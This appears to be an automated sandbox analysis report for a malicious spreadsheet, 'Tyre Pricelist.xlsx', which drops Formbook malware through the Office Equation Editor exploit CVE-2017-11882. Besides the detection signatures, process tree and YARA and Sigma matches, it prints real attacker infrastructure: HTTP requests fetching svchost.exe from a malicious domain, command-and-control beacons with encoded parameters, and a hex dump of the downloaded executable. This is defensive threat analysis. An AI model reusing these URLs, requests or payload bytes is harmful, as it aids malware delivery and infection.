
Analysis Report Tyre Pricelist.xlsx

Overview

General Information

Sample Name: Tyre Pricelist.xlsx
Analysis ID: 321115
MD5: 3b5f7a2a0429e796040aa5bc3763a8fe
SHA1: c049ac5a44d034995a55bd5f49aece9631c69c1f
SHA256: 9853da661450f9b9a4c06dc952bc70d7cdd8e80cf7e9f8189f2d15682bd88434
Tags: Formbook, VelvetSweatshop, xlsx

Most interesting Screenshot:

Detection

FormBook
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus detection for dropped file
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Sigma detected: Droppers Exploiting CVE-2017-11882
Sigma detected: EQNEDT32.EXE connecting to internet
Sigma detected: File Dropped By EQNEDT32EXE
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
System process connects to network (likely due to code injection or exploit)
Yara detected FormBook
Drops PE files to the user root directory
Machine Learning detection for dropped file
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Modifies the prolog of user mode functions (user mode inline hooks)
Office equation editor drops PE file
Office equation editor starts processes (likely CVE-2017-11882 or CVE-2018-0802)
Queues an APC in another process (thread injection)
Sample uses process hollowing technique
Sigma detected: Executables Started in Suspicious Folder
Sigma detected: Execution in Non-Executable Folder
Sigma detected: Suspicious Program Location Process Starts
Tries to detect virtualization through RDTSC time measurements
Uses netstat to query active network connections and open ports
Writes to foreign memory regions
Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)
Antivirus or Machine Learning detection for unpacked file
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to read the PEB
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Deletes files inside the Windows folder
Detected potential crypto function
Document misses a certain OLE stream usually present in this Microsoft Office document type
Downloads executable code via HTTP
Drops PE files
Drops PE files to the user directory
Enables debug privileges
Found inlined nop instructions (likely shell or obfuscated code)
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Office Equation Editor has been started
Potential document exploit detected (performs DNS queries)
Potential document exploit detected (performs HTTP gets)
Potential document exploit detected (unknown TCP traffic)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

Startup

  • System is w7x64
  • EXCEL.EXE (PID: 2300 cmdline: 'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding MD5: 5FB0A0F93382ECD19F5F499A5CAA59F0)
  • EQNEDT32.EXE (PID: 2332 cmdline: 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding MD5: A87236E214F6D42A65F5DEDAC816AEC8)
    • vbc.exe (PID: 2816 cmdline: 'C:\Users\Public\vbc.exe' MD5: 429BBA6DBE159C300679509BE3085665)
      • RegAsm.exe (PID: 2884 cmdline: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe MD5: ADF76F395D5A0ECBBF005390B73C3FD2)
      • RegAsm.exe (PID: 2464 cmdline: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe MD5: ADF76F395D5A0ECBBF005390B73C3FD2)
        • explorer.exe (PID: 1388 cmdline: MD5: 38AE1B3C38FAEF56FE4907922F0385BA)
          • NETSTAT.EXE (PID: 2832 cmdline: C:\Windows\SysWOW64\NETSTAT.EXE MD5: 32297BB17E6EC700D0FC869F9ACAF561)
            • cmd.exe (PID: 2220 cmdline: /c del 'C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe' MD5: AD7B9C14083B52BC532FBA5948342B98)
      • cmd.exe (PID: 2468 cmdline: 'C:\Windows\System32\cmd.exe' /C choice /C Y /N /D Y /T 3 & Del 'C:\Users\Public\vbc.exe' MD5: AD7B9C14083B52BC532FBA5948342B98)
        • choice.exe (PID: 2368 cmdline: choice /C Y /N /D Y /T 3 MD5: 11DDFBF834BB2C6F4D23297D80EE9E45)
  • cleanup

Malware Configuration

No configs have been found

Yara Overview

Memory Dumps

Source | Rule | Description | Author
00000006.00000002.2219572651.0000000000A20000.00000040.00000001.sdmp | JoeSecurity_FormBook | Yara detected FormBook | Joe Security
00000006.00000002.2219572651.0000000000A20000.00000040.00000001.sdmp | Formbook_1 | autogenerated rule brought to you by yara-signator | Felix Bilstein - yara-signator at cocacoding dot com
  Strings:
  • 0x98e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
  • 0x9b52:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
  • 0x15675:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
  • 0x15161:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
  • 0x15777:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
  • 0x158ef:$sequence_4: 5D C3 8D 50 7C 80 FA 07
  • 0xa56a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
  • 0x143dc:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
  • 0xb263:$sequence_7: 66 89 0C 02 5B 8B E5 5D
  • 0x1b317:$sequence_8: 3C 54 74 04 3C 74 75 F4
  • 0x1c31a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
00000006.00000002.2219572651.0000000000A20000.00000040.00000001.sdmp | Formbook | detect Formbook in memory | JPCERT/CC Incident Response Group
  Strings:
  • 0x183f9:$sqlite3step: 68 34 1C 7B E1
  • 0x1850c:$sqlite3step: 68 34 1C 7B E1
  • 0x18428:$sqlite3text: 68 38 2A 90 C5
  • 0x1854d:$sqlite3text: 68 38 2A 90 C5
  • 0x1843b:$sqlite3blob: 68 53 D8 7F 8C
  • 0x18563:$sqlite3blob: 68 53 D8 7F 8C
00000004.00000002.2192654886.00000000040A9000.00000004.00000001.sdmp | JoeSecurity_FormBook | Yara detected FormBook | Joe Security
00000004.00000002.2192654886.00000000040A9000.00000004.00000001.sdmp | Formbook_1 | autogenerated rule brought to you by yara-signator | Felix Bilstein - yara-signator at cocacoding dot com
  Strings:
  • 0xa3a98:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
  • 0xa3d02:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
  • 0xaf825:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
  • 0xaf311:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
  • 0xaf927:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
  • 0xafa9f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
  • 0xa471a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
  • 0xae58c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
  • 0xa5413:$sequence_7: 66 89 0C 02 5B 8B E5 5D
  • 0xb54c7:$sequence_8: 3C 54 74 04 3C 74 75 F4
  • 0xb64ca:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00

Unpacked PEs

Source | Rule | Description | Author
4.2.vbc.exe.510000.0.raw.unpack | JoeSecurity_FormBook | Yara detected FormBook | Joe Security
4.2.vbc.exe.510000.0.raw.unpack | Formbook_1 | autogenerated rule brought to you by yara-signator | Felix Bilstein - yara-signator at cocacoding dot com
  Strings:
  • 0x98e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
  • 0x9b52:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
  • 0x15675:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
  • 0x15161:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
  • 0x15777:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
  • 0x158ef:$sequence_4: 5D C3 8D 50 7C 80 FA 07
  • 0xa56a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
  • 0x143dc:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
  • 0xb263:$sequence_7: 66 89 0C 02 5B 8B E5 5D
  • 0x1b317:$sequence_8: 3C 54 74 04 3C 74 75 F4
  • 0x1c31a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
4.2.vbc.exe.510000.0.raw.unpack | Formbook | detect Formbook in memory | JPCERT/CC Incident Response Group
  Strings:
  • 0x183f9:$sqlite3step: 68 34 1C 7B E1
  • 0x1850c:$sqlite3step: 68 34 1C 7B E1
  • 0x18428:$sqlite3text: 68 38 2A 90 C5
  • 0x1854d:$sqlite3text: 68 38 2A 90 C5
  • 0x1843b:$sqlite3blob: 68 53 D8 7F 8C
  • 0x18563:$sqlite3blob: 68 53 D8 7F 8C
4.2.vbc.exe.510000.0.unpack | JoeSecurity_FormBook | Yara detected FormBook | Joe Security
4.2.vbc.exe.510000.0.unpack | Formbook_1 | autogenerated rule brought to you by yara-signator | Felix Bilstein - yara-signator at cocacoding dot com
  Strings:
  • 0x8ae8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
  • 0x8d52:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
  • 0x14875:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
  • 0x14361:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
  • 0x14977:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
  • 0x14aef:$sequence_4: 5D C3 8D 50 7C 80 FA 07
  • 0x976a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
  • 0x135dc:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
  • 0xa463:$sequence_7: 66 89 0C 02 5B 8B E5 5D
  • 0x1a517:$sequence_8: 3C 54 74 04 3C 74 75 F4
  • 0x1b51a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00

Sigma Overview

System Summary:

Sigma detected: Droppers Exploiting CVE-2017-11882
Source: Process started, Author: Florian Roth, Data: Command: 'C:\Users\Public\vbc.exe' , CommandLine: 'C:\Users\Public\vbc.exe' , CommandLine|base64offset|contains: , Image: C:\Users\Public\vbc.exe, NewProcessName: C:\Users\Public\vbc.exe, OriginalFileName: C:\Users\Public\vbc.exe, ParentCommandLine: 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding, ParentImage: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, ParentProcessId: 2332, ProcessCommandLine: 'C:\Users\Public\vbc.exe' , ProcessId: 2816
Sigma detected: EQNEDT32.EXE connecting to internet
Source: Network Connection, Author: Joe Security, Data: DestinationIp: 103.125.191.5, DestinationIsIpv6: false, DestinationPort: 80, EventID: 3, Image: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, Initiated: true, ProcessId: 2332, Protocol: tcp, SourceIp: 192.168.2.22, SourceIsIpv6: false, SourcePort: 49165
Sigma detected: File Dropped By EQNEDT32EXE
Source: File created, Author: Joe Security, Data: EventID: 11, Image: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, ProcessId: 2332, TargetFilename: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\svchost[1].exe
Sigma detected: Executables Started in Suspicious Folder
Source: Process started, Author: Florian Roth, Data: Command: 'C:\Users\Public\vbc.exe' , CommandLine: 'C:\Users\Public\vbc.exe' , CommandLine|base64offset|contains: , Image: C:\Users\Public\vbc.exe, NewProcessName: C:\Users\Public\vbc.exe, OriginalFileName: C:\Users\Public\vbc.exe, ParentCommandLine: 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding, ParentImage: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, ParentProcessId: 2332, ProcessCommandLine: 'C:\Users\Public\vbc.exe' , ProcessId: 2816
Sigma detected: Execution in Non-Executable Folder
Source: Process started, Author: Florian Roth, Data: Command: 'C:\Users\Public\vbc.exe' , CommandLine: 'C:\Users\Public\vbc.exe' , CommandLine|base64offset|contains: , Image: C:\Users\Public\vbc.exe, NewProcessName: C:\Users\Public\vbc.exe, OriginalFileName: C:\Users\Public\vbc.exe, ParentCommandLine: 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding, ParentImage: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, ParentProcessId: 2332, ProcessCommandLine: 'C:\Users\Public\vbc.exe' , ProcessId: 2816
Sigma detected: Suspicious Program Location Process Starts
Source: Process started, Author: Florian Roth, Data: Command: 'C:\Users\Public\vbc.exe' , CommandLine: 'C:\Users\Public\vbc.exe' , CommandLine|base64offset|contains: , Image: C:\Users\Public\vbc.exe, NewProcessName: C:\Users\Public\vbc.exe, OriginalFileName: C:\Users\Public\vbc.exe, ParentCommandLine: 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding, ParentImage: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, ParentProcessId: 2332, ProcessCommandLine: 'C:\Users\Public\vbc.exe' , ProcessId: 2816

Signature Overview

AV Detection:

Antivirus detection for dropped file
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\svchost[1].exe, Avira: detection malicious, Label: TR/AD.Swotter.sxyuz
Source: C:\Users\Public\vbc.exe, Avira: detection malicious, Label: TR/AD.Swotter.sxyuz
Multi AV Scanner detection for dropped file
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\svchost[1].exe, ReversingLabs: Detection: 33%
Source: C:\Users\Public\vbc.exe, ReversingLabs: Detection: 33%
Multi AV Scanner detection for submitted file
Source: Tyre Pricelist.xlsx, Virustotal: Detection: 27%
Source: Tyre Pricelist.xlsx, ReversingLabs: Detection: 20%
Yara detected FormBook
Source: Yara match, File source: 00000006.00000002.2219572651.0000000000A20000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match, File source: 00000004.00000002.2192654886.00000000040A9000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match, File source: 00000004.00000003.2185713552.0000000005083000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match, File source: 0000000B.00000002.2385404408.0000000000510000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match, File source: 00000004.00000002.2194941292.00000000050B3000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match, File source: 00000004.00000002.2190181482.0000000000510000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match, File source: 00000006.00000002.2216844899.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match, File source: 0000000B.00000002.2385365843.00000000003D0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match, File source: 00000006.00000002.2217232228.0000000000880000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match, File source: 0000000B.00000002.2385186068.0000000000080000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match, File source: 4.2.vbc.exe.510000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match, File source: 4.2.vbc.exe.510000.0.unpack, type: UNPACKEDPE
Source: Yara match, File source: 6.2.RegAsm.exe.400000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match, File source: 6.2.RegAsm.exe.400000.1.unpack, type: UNPACKEDPE
Machine Learning detection for dropped file
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\svchost[1].exe, Joe Sandbox ML: detected
Source: C:\Users\Public\vbc.exe, Joe Sandbox ML: detected
Source: 4.2.vbc.exe.510000.0.unpack, Avira: Label: TR/Crypt.ZPACK.Gen
Source: 6.2.RegAsm.exe.400000.1.unpack, Avira: Label: TR/Crypt.ZPACK.Gen

Exploits:

Office equation editor starts processes (likely CVE-2017-11882 or CVE-2018-0802)
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, Process created: C:\Users\Public\vbc.exe
Source: unknown, Process created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe, Code function: 4x nop then pop esi
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe, Code function: 4x nop then pop esi
Source: C:\Windows\SysWOW64\NETSTAT.EXE, Code function: 4x nop then pop esi
Source: C:\Windows\SysWOW64\NETSTAT.EXE, Code function: 4x nop then pop esi
Source: global traffic, DNS query: name: workfinethdysanotherrainbowlomoyentthghf.ydns.eu
Source: global traffic, TCP traffic: 192.168.2.22:49165 -> 103.125.191.5:80
Source: global traffic, TCP traffic: 192.168.2.22:49165 -> 103.125.191.5:80

Networking:

Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Source: Traffic, Snort IDS: 2022550 ET TROJAN Possible Malicious Macro DL EXE Feb 2016 192.168.2.22:49165 -> 103.125.191.5:80
Uses netstat to query active network connections and open ports
Source: unknown, Process created: C:\Windows\SysWOW64\NETSTAT.EXE C:\Windows\SysWOW64\NETSTAT.EXE
          Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKDate: Fri, 20 Nov 2020 10:23:44 GMTServer: Apache/2.4.34 (Win32) OpenSSL/1.0.2o PHP/5.6.38Last-Modified: Thu, 19 Nov 2020 21:43:46 GMTETag: "92600-5b47c9f64afa6"Accept-Ranges: bytesContent-Length: 599552Keep-Alive: timeout=5, max=100Connection: Keep-AliveContent-Type: application/x-msdownloadData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 03 e7 b6 5f 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 08 00 00 1e 09 00 00 06 00 00 00 00 00 00 de 3d 09 00 00 20 00 00 00 40 09 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 80 09 00 00 02 00 00 55 96 09 00 02 00 40 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 8c 3d 09 00 4f 00 00 00 00 40 09 00 42 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 60 09 00 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 08 00 00 00 00 00 00 00 00 00 00 00 08 20 00 00 48 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 e4 1d 09 00 00 20 00 00 00 1e 09 00 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 73 72 63 00 00 00 42 02 00 00 00 40 09 00 00 04 00 00 00 20 09 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 0c 00 00 00 00 60 09 00 00 02 00 00 00 24 09 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 3d 09 00 00 00 00 00 48 00 00 00 02 00 05 00 88 9d 08 00 04 a0 00 00 03 00 00 00 10 00 
00 06 f0 71 00 00 98 2b 08 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 61 00 62 00 64 00 63 00 65 00 66 00 67 00 68 00 69 00 6a 00 6b 00 6c 00 6d 00 6e 00 70 00 72 00 71 00 73 00 74 00 75 00 76 00 77 00 7a 00 79 00 78 00 30 00 31 00 32 00 33 00 34 00 35 00 36 00 37 00 38 00 39 00 41 00 42 00 43 00 44 00 45 00 46 00 47 00 48 00 49 00 4a 00 4b 00 4c 00 4d 00 4e 00 51 00 50 00 52 00 54 00 53 00 56 00 55 00 57 00 58 00 59 00 5a 00 36 02 03 28 03 00 00 06 6f 01 00 00 0a 2a 42 03 02 03 28 01 00 00 06 14 6f 02 00 00 0a 26 2a 32 02 28 05 00 00 06 74 06 00 00 01 2a 1e 28 06 00 00 06 26 2a 32 02 74 07 00 00 01 6f 03 00 00 0a 2a 46 7e 02 00 00 04 7e 03 00 00 04 28 02 00 00 06 17 2a 0a 16 2a 1e 02 28 07 00 00 0a 2a ba 28 08 00 00 0a 80 01 00 00 04 28 0d 00 00 06 28 09 00 00 0a 80 02 00 00 04 28 0d 00 00 06 28 09 00 00 0a 6f 0a 00 00 0a 80 03 00 00 04 2a 26 02 03 04 6f 0b 00 00 0a 2a 1a 28 04 00 00 06 2a 1a 28 0e 00 00 06 2a 2e 72 3f 00 00 70 80 04 00 00 0
Source: global traffic, HTTP traffic detected:
  GET /kgw/?UL0tlN9h=3DxvAc+RnyJZYPd+jiD/A7jyp+1eDPaflq2WzCVhzhMiI/AcsKs8L0UbA7cJFll24IqQXw==&_L30=xTm4lrNPut HTTP/1.1
  Host: www.pestigenix.com
  Connection: close
  Data Raw: 00 00 00 00 00 00 00
  Data Ascii:
Source: global traffic, HTTP traffic detected:
  GET /kgw/?UL0tlN9h=3e4oHR0srMrz4pb/7ChAIv3inAbNRhZBDtLZ1SN+NiEwBpgcLnXYR/VVRXtAcpgPjhXSMA==&_L30=xTm4lrNPut HTTP/1.1
  Host: www.atlanticdentallab.com
  Connection: close
  Data Raw: 00 00 00 00 00 00 00
  Data Ascii:
Source: Joe Sandbox View, ASN Name: SEDO-ASDE SEDO-ASDE
Source: Joe Sandbox View, ASN Name: VNPT-AS-VNVIETNAMPOSTSANDTELECOMMUNICATIONSGROUPVN VNPT-AS-VNVIETNAMPOSTSANDTELECOMMUNICATIONSGROUPVN
Source: Joe Sandbox View, ASN Name: BCPL-SGBGPNETGlobalASNSG BCPL-SGBGPNETGlobalASNSG
Source: global traffic, HTTP traffic detected:
  GET /worksdoc/svchost.exe HTTP/1.1
  Accept: */*
  Accept-Encoding: gzip, deflate
  User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
  Host: workfinethdysanotherrainbowlomoyentthghf.ydns.eu
  Connection: Keep-Alive
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\svchost[1].exe
Source: global traffic, HTTP traffic detected:
  GET /worksdoc/svchost.exe HTTP/1.1
  Accept: */*
  Accept-Encoding: gzip, deflate
  User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
  Host: workfinethdysanotherrainbowlomoyentthghf.ydns.eu
  Connection: Keep-Alive
Source: global traffic, HTTP traffic detected:
  GET /kgw/?UL0tlN9h=3DxvAc+RnyJZYPd+jiD/A7jyp+1eDPaflq2WzCVhzhMiI/AcsKs8L0UbA7cJFll24IqQXw==&_L30=xTm4lrNPut HTTP/1.1
  Host: www.pestigenix.com
  Connection: close
  Data Raw: 00 00 00 00 00 00 00
  Data Ascii:
Source: global traffic, HTTP traffic detected:
  GET /kgw/?UL0tlN9h=3e4oHR0srMrz4pb/7ChAIv3inAbNRhZBDtLZ1SN+NiEwBpgcLnXYR/VVRXtAcpgPjhXSMA==&_L30=xTm4lrNPut HTTP/1.1
  Host: www.atlanticdentallab.com
  Connection: close
  Data Raw: 00 00 00 00 00 00 00
  Data Ascii:
Source: explorer.exe, 00000008.00000000.2207343803.000000000A3E9000.00000008.00000001.sdmp, String found in binary or memory: <FavoriteIcon>http://www.facebook.com/favicon.ico</FavoriteIcon> equals www.facebook.com (Facebook)
Source: explorer.exe, 00000008.00000000.2207343803.000000000A3E9000.00000008.00000001.sdmp, String found in binary or memory: <FavoriteIcon>http://www.myspace.com/favicon.ico</FavoriteIcon> equals www.myspace.com (Myspace)
Source: explorer.exe, 00000008.00000000.2207343803.000000000A3E9000.00000008.00000001.sdmp, String found in binary or memory: <FavoriteIcon>http://www.rambler.ru/favicon.ico</FavoriteIcon> equals www.rambler.ru (Rambler)
Source: explorer.exe, 00000008.00000000.2207343803.000000000A3E9000.00000008.00000001.sdmp, String found in binary or memory: <URL>http://www.facebook.com/</URL> equals www.facebook.com (Facebook)
Source: explorer.exe, 00000008.00000000.2207343803.000000000A3E9000.00000008.00000001.sdmp, String found in binary or memory: <URL>http://www.rambler.ru/</URL> equals www.rambler.ru (Rambler)
Source: unknown, DNS traffic detected: queries for: workfinethdysanotherrainbowlomoyentthghf.ydns.eu
Source: explorer.exe, 00000008.00000000.2207343803.000000000A3E9000.00000008.00000001.sdmp, String found in binary or memory: http://amazon.fr/
Source: explorer.exe, 00000008.00000000.2207343803.000000000A3E9000.00000008.00000001.sdmp, String found in binary or memory: http://ariadna.elmundo.es/
Source: explorer.exe, 00000008.00000000.2207343803.000000000A3E9000.00000008.00000001.sdmp, String found in binary or memory: http://ariadna.elmundo.es/favicon.ico
Source: explorer.exe, 00000008.00000000.2207343803.000000000A3E9000.00000008.00000001.sdmp, String found in binary or memory: http://arianna.libero.it/
Source: explorer.exe, 00000008.00000000.2207343803.000000000A3E9000.00000008.00000001.sdmp, String found in binary or memory: http://arianna.libero.it/favicon.ico
Source: explorer.exe, 00000008.00000000.2207343803.000000000A3E9000.00000008.00000001.sdmp, String found in binary or memory: http://asp.usatoday.com/
Source: explorer.exe, 00000008.00000000.2207343803.000000000A3E9000.00000008.00000001.sdmp, String found in binary or memory: http://asp.usatoday.com/favicon.ico
Source: explorer.exe, 00000008.00000000.2207343803.000000000A3E9000.00000008.00000001.sdmp, String found in binary or memory: http://auone.jp/favicon.ico
Source: explorer.exe, 00000008.00000000.2207343803.000000000A3E9000.00000008.00000001.sdmp, String found in binary or memory: http://br.search.yahoo.com/
Source: explorer.exe, 00000008.00000000.2207343803.000000000A3E9000.00000008.00000001.sdmp, String found in binary or memory: http://browse.guardian.co.uk/
Source: explorer.exe, 00000008.00000000.2207343803.000000000A3E9000.00000008.00000001.sdmp, String found in binary or memory: http://browse.guardian.co.uk/favicon.ico
Source: explorer.exe, 00000008.00000000.2207343803.000000000A3E9000.00000008.00000001.sdmp, String found in binary or memory: http://busca.buscape.com.br/
Source: explorer.exe, 00000008.00000000.2207343803.000000000A3E9000.00000008.00000001.sdmp, String found in binary or memory: http://busca.buscape.com.br/favicon.ico
Source: explorer.exe, 00000008.00000000.2207343803.000000000A3E9000.00000008.00000001.sdmp, String found in binary or memory: http://busca.estadao.com.br/favicon.ico
Source: explorer.exe, 00000008.00000000.2207343803.000000000A3E9000.00000008.00000001.sdmp, String found in binary or memory: http://busca.igbusca.com.br/
Source: explorer.exe, 00000008.00000000.2207343803.000000000A3E9000.00000008.00000001.sdmp, String found in binary or memory: http://busca.igbusca.com.br//app/static/images/favicon.ico
Source: explorer.exe, 00000008.00000000.2207343803.000000000A3E9000.00000008.00000001.sdmp, String found in binary or memory: http://busca.orange.es/
Source: explorer.exe, 00000008.00000000.2207343803.000000000A3E9000.00000008.00000001.sdmp, String found in binary or memory: http://busca.uol.com.br/
Source: explorer.exe, 00000008.00000000.2207343803.000000000A3E9000.00000008.00000001.sdmp, String found in binary or memory: http://busca.uol.com.br/favicon.ico
Source: explorer.exe, 00000008.00000000.2207343803.000000000A3E9000.00000008.00000001.sdmp, String found in binary or memory: http://buscador.lycos.es/
Source: explorer.exe, 00000008.00000000.2207343803.000000000A3E9000.00000008.00000001.sdmp, String found in binary or memory: http://buscador.terra.com.br/
Source: explorer.exe, 00000008.00000000.2207343803.000000000A3E9000.00000008.00000001.sdmp, String found in binary or memory: http://buscador.terra.com/
Source: explorer.exe, 00000008.00000000.2207343803.000000000A3E9000.00000008.00000001.sdmp, String found in binary or memory: http://buscador.terra.com/favicon.ico
Source: explorer.exe, 00000008.00000000.2207343803.000000000A3E9000.00000008.00000001.sdmp, String found in binary or memory: http://buscador.terra.es/
Source: explorer.exe, 00000008.00000000.2207343803.000000000A3E9000.00000008.00000001.sdmp, String found in binary or memory: http://buscar.ozu.es/
Source: explorer.exe, 00000008.00000000.2207343803.000000000A3E9000.00000008.00000001.sdmp, String found in binary or memory: http://buscar.ya.com/
Source: explorer.exe, 00000008.00000000.2207343803.000000000A3E9000.00000008.00000001.sdmp, String found in binary or memory: http://busqueda.aol.com.mx/
Source: explorer.exe, 00000008.00000000.2207343803.000000000A3E9000.00000008.00000001.sdmp, String found in binary or memory: http://cerca.lycos.it/
